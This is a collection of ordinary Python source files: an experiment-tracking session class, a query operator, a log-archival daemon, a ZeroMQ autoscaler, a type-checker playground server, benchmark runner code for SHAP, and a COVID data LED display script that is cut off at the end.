source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
session.py | import os
import atexit
import signal
import threading
from typing import Optional
from aim.sdk.legacy.session.utils import exception_resistant
from aim.sdk.legacy.deprecation_warning import deprecated
from aim.ext.resource.configs import DEFAULT_SYSTEM_TRACKING_INT
from aim.ext.resource.tracker import ResourceTracker
from aim.sdk.repo import Repo
from aim.sdk.run import Run
class Session:
sessions = {}
_are_exit_listeners_set = False
_original_sigint_handler = None
_original_sigterm_handler = None
@deprecated
def __init__(self, repo: Optional[str] = None,
experiment: Optional[str] = None,
flush_frequency: int = 0, # unused
block_termination: bool = True, # unused
run: Optional[str] = None,
system_tracking_interval: Optional[int] = DEFAULT_SYSTEM_TRACKING_INT):
self._repo = Repo.from_path(repo) if repo else Repo.default_repo()
self._repo_path = self._repo.path
self._run = Run(run, repo=self._repo, experiment=experiment,
system_tracking_interval=system_tracking_interval)
self._run_hash = self._run.hashname
self.active = True
Session.sessions.setdefault(self._repo_path, [])
Session.sessions[self._repo_path].append(self)
# Bind signal listeners
self._set_exit_handlers()
@property
def run_hash(self):
return self._run_hash
@property
def repo_path(self):
return self._repo_path
@exception_resistant
def track(self, *args, **kwargs):
val = args[0]
name = kwargs.pop('name')
step = kwargs.pop('step', None)
epoch = kwargs.pop('epoch', None)
for key in kwargs.keys():
if key.startswith('__'):
del kwargs[key]
self._run.track(val, name=name, step=step, epoch=epoch, context=kwargs)
@exception_resistant
def set_params(self, params: dict, name: Optional[str] = None):
if name is None:
self._run[...] = params
else:
self._run[name] = params
def flush(self):
pass
@exception_resistant
def close(self):
if not self.active:
raise Exception('session is closed')
if self._run:
del self._run
self._run = None
if self._repo_path in Session.sessions \
and self in Session.sessions[self._repo_path]:
Session.sessions[self._repo_path].remove(self)
if len(Session.sessions[self._repo_path]) == 0:
del Session.sessions[self._repo_path]
self.active = False
@classmethod
def _close_sessions(cls, *args, **kwargs):
threads = []
for _, sessions in cls.sessions.items():
for session in sessions:
th = threading.Thread(target=session.close)
th.daemon = True
threads.append(th)
for th in threads:
th.start()
for th in threads:
th.join()
if len(args):
if args[0] == 15:
signal.signal(signal.SIGTERM, cls._original_sigterm_handler)
os.kill(os.getpid(), 15)
# elif args[0] == 2:
# signal.signal(signal.SIGINT, cls._original_sigint_handler)
# os.kill(os.getpid(), 2)
@classmethod
def _set_exit_handlers(cls):
if not cls._are_exit_listeners_set:
cls._are_exit_listeners_set = True
# cls._original_sigint_handler = signal.getsignal(signal.SIGINT)
cls._original_sigterm_handler = signal.getsignal(signal.SIGTERM)
atexit.register(cls._close_sessions)
# signal.signal(signal.SIGINT, cls._close_sessions)
signal.signal(signal.SIGTERM, cls._close_sessions)
DefaultSession = Session
def get_default_session() -> Session:
if len(Session.sessions.keys()) > 0:
default_sess_key = list(Session.sessions.keys())[0]
if len(Session.sessions[default_sess_key]) > 0:
return Session.sessions[default_sess_key][0]
# Create and return default session otherwise
return DefaultSession()
|
dependent_operator.py | from multiprocessing import Process, Queue
from nlde.engine.contact_source import contact_source, contact_source_bindings
from nlde.operators.operatorstructures import Tuple
from nlde.query import TriplePattern, Argument
from time import time
class DependentOperator(object):
"""
Implements a plan leaf that is resolved by a dependent physical operator.
The execute() method reads tuples from the input queue and
place them in the output queue.
"""
def __init__(self, sources, server, query, sources_desc, variables=None, res=0):
if variables is None:
variables = []
self.server = server
if isinstance(sources, int):
self.sources = {sources: set([str(var) for var in variables])}
else:
self.sources = sources
self.sources_desc = sources_desc
self.server = server
self.query = query
self.vars = set(variables)
self.join_vars = set(variables)
self.total_res = res
self.height = 0
self.p = None
self.cost = None
def __str__(self):
return "Dependent: {} ({} @ {})".format(self.query, self.cardinality, ",".join("({}: {})".format(source,
value) for
source,
value in
self.query.sources.items() ))
@property
def variables_dict(self):
return self.query.variables_dict
@property
def cardinality(self):
return self.query.cardinality
@property
def selectivity(self):
return self.query.selectivity
def compute_cost(self, cost_model):
cost_function = cost_model[type(self)]
self.cost = cost_function(self)
return self.cost
def execute(self, variables, instances, outputqueue ,ldf_server=None, p_list=None):
#self.q = Queue()
# Make instances a list, if not yet
if not isinstance(instances, list):
instances = [instances]
# If pre-selection of ldf servers exists
if ldf_server:
ldf_servers = [ldf_server]
else:
ldf_servers = self.query.sources
# Create process to contact sources.
aux_queue = Queue()
#self.p = Process(target=contact_source_bindings, args=(ldf_servers, self.query, aux_queue, instances,
# list(variables)))
#print ldf_servers, self.query, self.query.sources, instances, variables
contact_source_bindings(ldf_servers, self.query, aux_queue, instances, list(variables))
#self.p.start()
sources = self.sources.keys()
if p_list:
p_list.put(self.p.pid)
# Ready and done vectors.
ready = self.sources_desc[self.sources.keys()[0]]
done = 0
# Get answers from the sources.
data = aux_queue.get(True)
while data != "EOF":
# TODO: Check why this is needed.
#data.update(inst)
# Create tuple and put it in output queue.
outputqueue.put(Tuple(data, ready, done, sources))
# Get next answer.
data = aux_queue.get(True)
# Close the queue
aux_queue.close()
#self.p.terminate()
outputqueue.put(Tuple("EOF", ready, done, sources))
def execute_old(self, variables, instances, outputqueue ,p_list=None):
self.q = Queue()
# Copy the query array and obtain variables.
query = [self.query.subject.value, self.query.predicate.value, self.query.object.value]
variables = list(variables)
# Instantiate variables in the query.
inst = {}
for i in variables:
inst.update({i: instances[i]})
#inst_aux = str(instances[i]).replace(" ", "%%%")
# Remove the %%% replacement as it does not work with the current LDF Server implementation
inst_aux = str(instances[i])
for j in (0, 1, 2):
if query[j] == "?" + i:
query[j] = inst_aux
tp = TriplePattern(Argument(query[0]), Argument(query[1]), Argument(query[2]))
tp.sources = self.query.sources
# We need to handle the case that all variables are instatiated
vars = None
if tp.variable_position == 0:
vars = self.query.variables_dict
# Create process to contact sources.
aux_queue = Queue()
self.p = Process(target=contact_source, args=(self.query.sources, tp, aux_queue, vars))
self.p.start()
sources = self.sources.keys()
if p_list:
p_list.put(self.p.pid)
# Ready and done vectors.
ready = self.sources_desc[self.sources.keys()[0]]
done = 0
# Get answers from the sources.
data = aux_queue.get(True)
while data != "EOF":
# TODO: Check why this is needed.
data.update(inst)
# Create tuple and put it in output queue.
outputqueue.put(Tuple(data, ready, done, sources))
# Get next answer.
data = aux_queue.get(True)
# Close the queue
aux_queue.close()
self.p.terminate()
outputqueue.put(Tuple("EOF", ready, done, sources)) |
LogCycle.py | import threading
from pymongo import MongoClient
import datetime, time
from os import listdir
from os.path import isfile, join
class LogCycleDaemon:
def __init__(self):
super(LogCycleDaemon, self).__init__()
self.thread_stop_flag = True
self.MONGO_URL = "localhost"
self.MONGO_PORT = 27017
self.MONGO_DB = "LogNotifier"
self.MONGO_COLLECTION = "alert_log"
self.NO_OF_DAYS_LOG_CYCLE = 15
self.SLEEPER = 43200 # every 12 hrs
self.DATA_SIZE = 1000
self._PATH = './zarchive/'
def run(self):
t1 = threading.Thread(target=self.job, name='Thread-log-archival', args=())
t1.start()
def job(self):
while self.thread_stop_flag:
d = datetime.datetime.now() - datetime.timedelta(days=self.NO_OF_DAYS_LOG_CYCLE)
cnt = self.getLogCountBeforeDays(d)
if cnt > 0:
print("Archiving...")
self.archiveLogs(d)
print("Done archiving...")
print("Cleaning db...")
self.deleteArchivedLogs(d)
print("Done...")
time.sleep(self.SLEEPER)
def getLogCountBeforeDays(self, date):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
cnt = db.find({"datetimestamp": {'$lt': date}}).count()
con.close()
return cnt
def logDataForArchival(self, d):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
cur = db.find({"datetimestamp": {'$lt': d}}).sort("datetimestamp", -1)
d = list(cur)
con.close()
return d
def getLastFile(self):
path = self._PATH
fileslist = [f for f in listdir(path) if isfile(join(path, f))]
lastIndex = 0
for f in fileslist:
tmp = f[f.index("_") + 1:f.index(".txt")]
if int(tmp) > lastIndex:
lastIndex = int(tmp)
return lastIndex + 1
def deleteArchivedLogs(self, d):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
db.delete_many({"datetimestamp": {'$lt': d}})
con.close()
def archiveLogs(self, d):
logdata = self.logDataForArchival(d)
newCnt = self.getLastFile()
curCnt = 1
f = open(self._PATH + "log_" + str(newCnt) + ".txt", "a")
for l in logdata:
if curCnt == 100:
curCnt = 1
f.close()
newCnt += 1
f = open(self._PATH + "log_" + str(newCnt) + ".txt", "a")
f.write(str(l) + "\n")
curCnt += 1
f.close()
if __name__ == '__main__':
d = LogCycleDaemon()
d.run()
|
AutoScaler.py | import zmq
import threading as thd
class AutoScaler:
def __init__(self, signalsPort, asPorts):
self.sPort = signalsPort
self.asPorts = asPorts
self.lock = thd.Lock()
self.evContext = zmq.Context()
self.evSocket = self.evContext.socket(zmq.PUB)
self.evSocket.bind("tcp://*:{}".format(signalsPort))
self.asServers = {}
for cluster in asPorts.keys():
port = asPorts[cluster]
self.asServers[cluster] = self._get_asServer(port, cluster)
self.asServers[cluster].start()
def pr(self, txt):
print("\tAutoscaler::{}".format(txt))
def _get_asServer(self, port, cluster):
self.pr("Creating asServer for cluster:{} on port {}".format(cluster, port))
server = thd.Thread(target=self._as_server_wrk, args=(port, cluster), daemon=True)
return server
def _as_server_wrk(self, port, cluster):
self.pr('AS@{}: Creating server on {}'.format(cluster, port))
Context = zmq.Context()
Sock = Context.socket(zmq.REP)
Sock.bind("tcp://*:{}".format(port))
self.pr('AS@{}: Server binded.'.format(cluster))
while True:
req = Sock.recv_json()
self.pr('AS@{}: Got request: {}'.format(cluster, req))
result = self.__asServer(req, cluster)
self.pr('AS@{}: Sending response: {}'.format(cluster, result))
Sock.send_json(result)
def __asServer(self, req, cluster):
if req['msg'] != 'as?':
return {'msg':'ERR'}
item = self.getNextInClusterWithPop(cluster)
if item is None:
return {'msg':'as.', 'icIndex':-1}
return {'msg':'as.', 'icIndex':item[0], 'table':item[1]}
def setNewAutoScaling(self, asTableObj):
with self.lock:
self.asTableDS = {}
for cluster in asTableObj.keys():
self.asTableDS[cluster] = {}
clusterReq = asTableObj[cluster]
icCtr = 0
for nodesReq in clusterReq:
N = nodesReq[0]
table = nodesReq[1]
for _ in range(N):
self.asTableDS[cluster][icCtr] = table
icCtr += 1
self.evSocket.send_json({'as':'ev_newAs'})
def getNextInClusterWithPop(self, cluster):
with self.lock:
if len(self.asTableDS[cluster]) == 0:
return None
else:
ret = self.asTableDS[cluster].popitem()
if len(self.asTableDS[cluster]) == 0:
print('AS@{}: Cluster completely scaled.'.format(cluster))
return ret
|
application.py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
subprocess.check_call(
["pyre", "--noninteractive", "check"], cwd=self._directory
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive", "check"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
for line in iter(process.stderr.readline, b""):
line = line.rstrip()
if line == "":
break
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
elif "INFO" in line or "ERROR" in line:
if model_verification_errors:
# Emit all model verification lines together to prevent
# network overhead.
model_verification_error_output = "\n".join(
model_verification_errors
)
emit(
"pysa_results_channel",
{
"type": "output",
"line": model_verification_error_output,
},
)
LOG.debug(model_verification_error_output)
model_verification_errors = []
emit("pysa_results_channel", {"type": "output", "line": line})
LOG.debug(line)
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
pyre = Pyre()
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
experiments.py | from __future__ import print_function
from .. import datasets
from . import metrics
from . import models
from . import methods
from .. import __version__
import numpy as np
import sklearn
import os
import pickle
import sys
import time
import subprocess
from multiprocessing import Pool
import itertools
import copy
import random
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
regression_metrics = [
"local_accuracy",
"consistency_guarantees",
"keep_positive_mask",
"keep_positive_resample",
#"keep_positive_impute",
"keep_negative_mask",
"keep_negative_resample",
#"keep_negative_impute",
"keep_absolute_mask__r2",
"keep_absolute_resample__r2",
#"keep_absolute_impute__r2",
"remove_positive_mask",
"remove_positive_resample",
#"remove_positive_impute",
"remove_negative_mask",
"remove_negative_resample",
#"remove_negative_impute",
"remove_absolute_mask__r2",
"remove_absolute_resample__r2",
#"remove_absolute_impute__r2"
"runtime",
]
binary_classification_metrics = [
"local_accuracy",
"consistency_guarantees",
"keep_positive_mask",
"keep_positive_resample",
#"keep_positive_impute",
"keep_negative_mask",
"keep_negative_resample",
#"keep_negative_impute",
"keep_absolute_mask__roc_auc",
"keep_absolute_resample__roc_auc",
#"keep_absolute_impute__roc_auc",
"remove_positive_mask",
"remove_positive_resample",
#"remove_positive_impute",
"remove_negative_mask",
"remove_negative_resample",
#"remove_negative_impute",
"remove_absolute_mask__roc_auc",
"remove_absolute_resample__roc_auc",
#"remove_absolute_impute__roc_auc"
"runtime",
]
human_metrics = [
"human_and_00",
"human_and_01",
"human_and_11",
"human_or_00",
"human_or_01",
"human_or_11",
"human_xor_00",
"human_xor_01",
"human_xor_11",
"human_sum_00",
"human_sum_01",
"human_sum_11"
]
linear_regress_methods = [
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_regression_1000"
#"sampling_shap_100"
]
linear_classify_methods = [
# NEED LIME
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_regress_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap_tree_path_dependent",
"tree_shap_independent_200",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_regression_1000",
"maple"
#"sampling_shap_100"
]
rf_regress_methods = [ # methods that only support random forest models
"tree_maple"
]
tree_classify_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap_tree_path_dependent",
"tree_shap_independent_200",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_classification_1000",
"maple"
#"sampling_shap_100"
]
deep_regress_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
deep_classify_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
_experiments = []
_experiments += [["corrgroups60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "random_forest", m, s] for s in regression_metrics for m in (tree_regress_methods + rf_regress_methods)]
_experiments += [["corrgroups60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["independentlinear60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["independentlinear60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["independentlinear60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["independentlinear60", "random_forest", m, s] for s in regression_metrics for m in (tree_regress_methods + rf_regress_methods)]
_experiments += [["independentlinear60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["independentlinear60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["cric", "lasso", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "ridge", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "decision_tree", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "random_forest", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "gbm", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "ffnn", m, s] for s in binary_classification_metrics for m in deep_classify_methods]
_experiments += [["human", "decision_tree", m, s] for s in human_metrics for m in tree_regress_methods]
def experiments(dataset=None, model=None, method=None, metric=None):
for experiment in _experiments:
if dataset is not None and dataset != experiment[0]:
continue
if model is not None and model != experiment[1]:
continue
if method is not None and method != experiment[2]:
continue
if metric is not None and metric != experiment[3]:
continue
yield experiment
def run_experiment(experiment, use_cache=True, cache_dir="/tmp"):
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if use_cache and os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from cache.")
return pickle.load(f)
# compute the scores
print(cache_id.replace("__", " ", 4) + " ...")
sys.stdout.flush()
start = time.time()
X,y = getattr(datasets, dataset_name)()
score = getattr(metrics, metric_name)(
X, y,
getattr(models, dataset_name+"__"+model_name),
method_name
)
print("...took %f seconds.\n" % (time.time() - start))
# cache the scores
with open(cache_file, "wb") as f:
pickle.dump(score, f)
return score
def run_experiments_helper(args):
experiment, cache_dir = args
return run_experiment(experiment, cache_dir=cache_dir)
def run_experiments(dataset=None, model=None, method=None, metric=None, cache_dir="/tmp", nworkers=1):
experiments_arr = list(experiments(dataset=dataset, model=model, method=method, metric=metric))
if nworkers == 1:
out = list(map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir))))
else:
with Pool(nworkers) as pool:
out = pool.map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir)))
return list(zip(experiments_arr, out))
nexperiments = 0
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
worker_lock = Lock()
ssh_conn_per_min_limit = 0 # set as an argument to run_remote_experiments
def __thread_worker(q, host):
global total_sent, total_done
hostname, python_binary = host.split(":")
while True:
# make sure we are not sending too many ssh connections to the host
# (if we send too many connections ssh thottling will lock us out)
while True:
all_clear = False
worker_lock.acquire()
try:
if hostname not in host_records:
host_records[hostname] = []
if len(host_records[hostname]) < ssh_conn_per_min_limit:
all_clear = True
elif time.time() - host_records[hostname][-ssh_conn_per_min_limit] > 61:
all_clear = True
finally:
worker_lock.release()
# if we are clear to send a new ssh connection then break
if all_clear:
break
# if we are not clear then we sleep and try again
time.sleep(5)
experiment = q.get()
# if we are not loading from the cache then we note that we have called the host
cache_dir = "/tmp"
cache_file = os.path.join(cache_dir, __gen_cache_id(experiment) + ".pickle")
if not os.path.isfile(cache_file):
worker_lock.acquire()
try:
host_records[hostname].append(time.time())
finally:
worker_lock.release()
# record how many we have sent off for executation
worker_lock.acquire()
try:
total_sent += 1
__print_status()
finally:
worker_lock.release()
__run_remote_experiment(experiment, hostname, cache_dir=cache_dir, python_binary=python_binary)
# record how many are finished
worker_lock.acquire()
try:
total_done += 1
__print_status()
finally:
worker_lock.release()
q.task_done()
def __print_status():
print("Benchmark task %d of %d done (%d failed, %d running)" % (total_done, nexperiments, total_failed, total_sent - total_done), end="\r")
sys.stdout.flush()
def run_remote_experiments(experiments, thread_hosts, rate_limit=10):
""" Use ssh to run the experiments on remote machines in parallel.
Parameters
----------
experiments : iterable
Output of shap.benchmark.experiments(...).
thread_hosts : list of strings
Each host has the format "host_name:path_to_python_binary" and can appear multiple times
in the list (one for each parallel execution you want on that machine).
rate_limit : int
How many ssh connections we make per minute to each host (to avoid throttling issues).
"""
global ssh_conn_per_min_limit
ssh_conn_per_min_limit = rate_limit
# first we kill any remaining workers from previous runs
# note we don't check_call because pkill kills our ssh call as well
thread_hosts = copy.copy(thread_hosts)
random.shuffle(thread_hosts)
for host in set(thread_hosts):
hostname,_ = host.split(":")
try:
subprocess.run(["ssh", hostname, "pkill -f shap.benchmark.run_experiment"], timeout=15)
except subprocess.TimeoutExpired:
print("Failed to connect to", hostname, "after 15 seconds! Exiting.")
return
experiments = copy.copy(list(experiments))
random.shuffle(experiments) # this way all the hard experiments don't get put on one machine
global nexperiments, total_sent, total_done, total_failed, host_records
nexperiments = len(experiments)
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
q = Queue()
for host in thread_hosts:
worker = Thread(target=__thread_worker, args=(q, host))
worker.setDaemon(True)
worker.start()
for experiment in experiments:
q.put(experiment)
q.join()
def __run_remote_experiment(experiment, remote, cache_dir="/tmp", python_binary="python"):
global total_failed
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
return pickle.load(f)
# this is just so we don't dump everything at once on a machine
time.sleep(random.uniform(0,5))
# run the benchmark on the remote machine
#start = time.time()
cmd = "CUDA_VISIBLE_DEVICES=\"\" "+python_binary+" -c \"import shap; shap.benchmark.run_experiment(['%s', '%s', '%s', '%s'], cache_dir='%s')\" &> %s/%s.output" % (
dataset_name, model_name, method_name, metric_name, cache_dir, cache_dir, cache_id
)
try:
subprocess.check_output(["ssh", remote, cmd])
except subprocess.CalledProcessError as e:
print("The following command failed on %s:" % remote, file=sys.stderr)
print(cmd, file=sys.stderr)
total_failed += 1
print(e)
return
# copy the results back
subprocess.check_output(["scp", remote+":"+cache_file, cache_file])
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from remote after %f seconds" % (time.time() - start))
return pickle.load(f)
else:
raise Exception("Remote benchmark call finished but no local file was found!")
def __gen_cache_id(experiment):
dataset_name, model_name, method_name, metric_name = experiment
return "v" + "__".join([__version__, dataset_name, model_name, method_name, metric_name]) |
main.py | import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
today = date.today()
a = str(today)
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
LED_init()
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
# 지역별 확진자 수 검색 함수
def search_count(js_file,search_region,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
array[1][1] = 1
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,0)
# 지역별 전날대비 확진자 수 증감 검색 함수
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
menu = 1
while(menu):
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
menu_choice = int(input("Select menu: "))
